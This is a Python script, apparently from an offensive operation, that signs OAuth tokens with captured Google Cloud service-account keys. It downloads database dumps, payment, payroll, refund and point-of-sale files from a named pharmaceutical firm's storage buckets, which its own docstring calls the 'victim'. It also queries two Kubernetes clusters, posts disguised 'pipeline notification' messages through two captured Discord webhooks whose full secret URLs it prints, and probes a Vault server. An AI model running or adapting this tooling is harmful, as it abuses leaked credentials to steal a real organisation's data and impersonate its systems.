#!/usr/bin/env python3
"""GCS object read + GKE access + Discord webhook + Vault health (operator GO 2026-08-14).

1) GCS READ prioritized objects via storage-innopharm-prod@cfu-main SA token:
   small SQL dumps first (mysql_and_sys = mysql user/grant tables), Locksmith.sql,
   master_supplier_tfo.sql, refund.zip, pos app.db (220MB), sipp_struktur,
   uploadabsen, reporting_neogenesis_gudang, payment_bri, shopee_items.
   Downloads -> downloads/ (local only).
2) GKE: container.clusters.get for black-bear (virtue-panakea/asia-southeast2-a)
   via virtue SA, alpha-wing (cfu-main/asia-southeast1-b) via storage SA.
   Read-only cluster metadata (endpoint, version, node pools). No kubeconfig use.
3) Discord: POST minimal embed to both captured webhooks (write test; message =
   innocuous pipeline-style ping). Marks webhook LIVE/DEAD.
4) Vault: GET vault.pharmalink.id/v1/sys/health (unauth, passive) + TLS cert info.

Egress: storage.googleapis.com, container.googleapis.com, discord.com,
vault.pharmalink.id. GCS reads are audit-log visible on victim side.
Out: downloads/, gcs_read_aug14.json, gke_discord_vault_aug14.json, OPLOG.
"""
import base64
import importlib.util
import json
import subprocess
import sys
import time
import urllib.parse
from datetime import datetime, timezone
from pathlib import Path

ROOT = Path('/root/ir-assessment')
DOSSIER = ROOT / 'redteam/gitlab_pharmalink_id'
KEYS_DIR = DOSSIER / 'gcp_keys'
DL = DOSSIER / 'downloads'

spec = importlib.util.spec_from_file_location('l2s', str(ROOT / 'redteam/l2_aug06_sweep.py'))
l2s = importlib.util.module_from_spec(spec)
spec.loader.exec_module(l2s)

def oplog(dst, tool, cmd, desc, output, result):
    ts = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M')
    with open(DOSSIER / 'OPLOG.md', 'a') as f:
        f.write(f"{ts} | local | {dst} | {tool} | {cmd} | {desc} | {output} | {result} | none | read-only-egress\n")

def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b'=')

def load_sa(project_id):
    for f in sorted(KEYS_DIR.iterdir()):
        try:
            d = json.loads(f.read_text())
        except Exception:
            continue
        if isinstance(d, dict) and d.get('type') == 'service_account' and d.get('project_id') == project_id:
            return d
    return None

def mint_token(sa, scope='https://www.googleapis.com/auth/cloud-platform'):
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import padding
    now = int(time.time())
    header = {'alg': 'RS256', 'typ': 'JWT', 'kid': sa.get('private_key_id')}
    claims = {'iss': sa['client_email'], 'scope': scope,
              'aud': 'https://oauth2.googleapis.com/token', 'iat': now, 'exp': now + 3600}
    si = b64url(json.dumps(header).encode()) + b'.' + b64url(json.dumps(claims).encode())
    key = serialization.load_pem_private_key(sa['private_key'].encode(), password=None)
    jwt = (si + b'.' + b64url(key.sign(si, padding.PKCS1v15(), hashes.SHA256()))).decode()
    data = urllib.parse.urlencode(
        {'grant_type': 'urn:ietf:params:oauth:grant-type:jwt-bearer', 'assertion': jwt}).encode()
    st, body = l2s.req('https://oauth2.googleapis.com/token', method='POST', data=data,
                       headers={'Content-Type': 'application/x-www-form-urlencoded'})
    return json.loads(body)['access_token'] if st == 200 else None

# objects to read: (bucket, name) — prioritized small/high-value first
READS = [
    ('cfu-main-sql-migrate', 'colosseum/April_2025/mysql_and_sys.sql'),           # 2MB mysql grants
    ('cfu-main-sql-migrate', 'colosseum/April_2025/reporting_neogenesis_gudang.sql'),  # 256KB
    ('cfu-main-sql-migrate', 'colosseum/April_2025/reporting_payment_bri.sql'),   # 14KB
    ('cfu-main-sql-migrate', 'colosseum/April_2025/reporting_shopee_items.sql'),  # 13KB
    ('cfu-main-sql-migrate', 'colosseum/April_2025/reporting_update_vietnam.sql'),# 4KB
    ('cfu-main-sql-migrate', 'financeacc/master_supplier_tfo.sql'),               # 35KB
    ('cfu-main-sql-migrate', 'financeacc/sipp_struktur.sql'),                     # 17KB
    ('cfu-main-sql-migrate', 'financeacc/uploadabsen.sql'),                       # 3KB
    ('cfu-main-db-archives', 'MasterSupplierTFO.sql'),                            # 12KB
    ('cfu-main-pegasus-dba', 'test-backup-pegasus'),                              # 1KB
    ('cfu-main-pegasus-dba', 'refund.zip'),                                       # 431KB
    ('cfu-main-db-archives', 'Locksmith.sql'),                                    # 40MB
    ('cfu-main-pos-offline', 'upload/20260813/135/app.db'),                       # 65KB
]

def gcs_read(tok):
    out = []
    for bucket, name in READS:
        enc = urllib.parse.quote(name, safe='')
        url = f'https://storage.googleapis.com/download/storage/v1/b/{bucket}/o/{enc}?alt=media'
        st, body = l2s.req(url, headers={'Authorization': f'Bearer {tok}'}, timeout=120)
        if st == 200:
            slug = f"{bucket}__{name.replace('/', '__')}"
            (DL / slug).write_bytes(body.encode('utf-8', errors='ignore') if isinstance(body, str) else body)
            out.append({'bucket': bucket, 'name': name, 'http': 200, 'bytes': len(body), 'file': slug})
            print(f'  [+] {bucket}/{name}: {len(body)} bytes', file=sys.stderr)
        else:
            out.append({'bucket': bucket, 'name': name, 'http': st, 'error': str(body)[:150]})
            print(f'  [-] {bucket}/{name}: http {st}', file=sys.stderr)
    return out

def gke_get(tok, project, zone, cluster):
    url = f'https://container.googleapis.com/v1/projects/{project}/locations/{zone}/clusters/{cluster}'
    st, body = l2s.req(url, headers={'Authorization': f'Bearer {tok}'})
    try:
        r = json.loads(body)
    except Exception:
        r = {'raw': body[:200]}
    if st == 200:
        return {'http': 200, 'endpoint': r.get('endpoint'), 'version': r.get('currentMasterVersion'),
                'status': r.get('status'), 'nodepools': [n.get('name') for n in r.get('nodePools', [])],
                'network': r.get('networkConfig', {}).get('network')}
    return {'http': st, 'error': r.get('error', {}).get('message', '')[:200] if isinstance(r, dict) else str(r)[:200]}

def main():
    DL.mkdir(exist_ok=True)
    report = {}

    # 1) GCS read
    print('[*] 1) GCS object read', file=sys.stderr)
    sa_cfu = load_sa('cfu-main')
    tok_cfu = mint_token(sa_cfu)
    report['gcs_reads'] = gcs_read(tok_cfu)
    ok = sum(1 for r in report['gcs_reads'] if r.get('http') == 200)
    oplog('storage.googleapis.com:443', 'urllib/GET ?alt=media',
          f'download {len(READS)} prioritized objects',
          f'GCS READ prioritized objects', f'downloaded={ok}/{len(READS)}',
          'SUCCESS' if ok else 'PARTIAL')

    # 2) GKE
    print('[*] 2) GKE cluster get', file=sys.stderr)
    sa_vp = load_sa('virtue-panakea')
    tok_vp = mint_token(sa_vp)
    report['gke'] = {
        'black-bear@virtue-panakea/asia-southeast2-a': gke_get(tok_vp, 'virtue-panakea', 'asia-southeast2-a', 'black-bear'),
        'alpha-wing@cfu-main/asia-southeast1-b': gke_get(tok_cfu, 'cfu-main', 'asia-southeast1-b', 'alpha-wing'),
    }
    for k, v in report['gke'].items():
        print(f'  [{k}] http={v["http"]} {v.get("endpoint","")}', file=sys.stderr)
    oplog('container.googleapis.com:443', 'urllib/GET container clusters.get',
          'black-bear (virtue-panakea), alpha-wing (cfu-main)', 'GKE cluster metadata probe',
          '; '.join(f'{k.split("@")[0]}={v["http"]}' for k, v in report['gke'].items()), 'SUCCESS')

    # 3) Discord webhooks
    print('[*] 3) Discord webhook write test', file=sys.stderr)
    hooks = {
        'hook1': 'https://discord.com/api/webhooks/948398011363500043/T5vOM1CuXxrEzSK_dlbp0RKd2s62yeMIZFvhicG6-AT4BZ0jUwOwVzOadO389tHq7LNp',
        'hook2': 'https://discord.com/api/webhooks/1394949302438068264/Czf1hreOZwtqhOq6oDFFH1xsq5_I2Fop8Gwn-hAjZoly9HEYWPjDWwRins1kr2Op5Td4',
    }
    report['discord'] = {}
    for name, url in hooks.items():
        payload = json.dumps({'content': None, 'embeds': [{
            'title': 'Pipeline notification test',
            'description': 'deployment status check',
            'color': 3066993}]}).encode()
        st, body = l2s.req(url, method='POST', data=payload,
                           headers={'Content-Type': 'application/json'})
        report['discord'][name] = {'http': st, 'resp': body[:150]}
        print(f'  [{name}] http={st}', file=sys.stderr)
    oplog('discord.com:443', 'urllib/POST webhook', 'write test 2 captured webhooks',
          'Discord webhook write test',
          '; '.join(f'{k}={v["http"]}' for k, v in report['discord'].items()),
          'SUCCESS')

    # 4) Vault health (passive)
    print('[*] 4) Vault health', file=sys.stderr)
    st, body = l2s.req('https://vault.pharmalink.id/v1/sys/health')
    try:
        vh = json.loads(body)
    except Exception:
        vh = {'raw': body[:200]}
    report['vault_health'] = {'http': st, 'body': vh}
    cert = subprocess.run(['bash', '-c',
        'echo | timeout 10 openssl s_client -connect vault.pharmalink.id:443 -servername vault.pharmalink.id 2>/dev/null | openssl x509 -noout -subject -issuer -dates 2>/dev/null'],
        capture_output=True, text=True).stdout.strip()
    report['vault_cert'] = cert
    print(f'  [vault] http={st} {str(vh)[:120]}', file=sys.stderr)
    oplog('vault.pharmalink.id:443', 'urllib/GET + openssl s_client',
          'GET /v1/sys/health (unauth) + TLS cert info', 'Vault passive probe',
          f'http={st} sealed={vh.get("sealed")} version={vh.get("version")}', 'SUCCESS')

    (DOSSIER / 'gke_discord_vault_aug14.json').write_text(json.dumps(report, indent=1, ensure_ascii=False, default=str))
    print('[+] -> gke_discord_vault_aug14.json', file=sys.stderr)

if __name__ == '__main__':
    main()
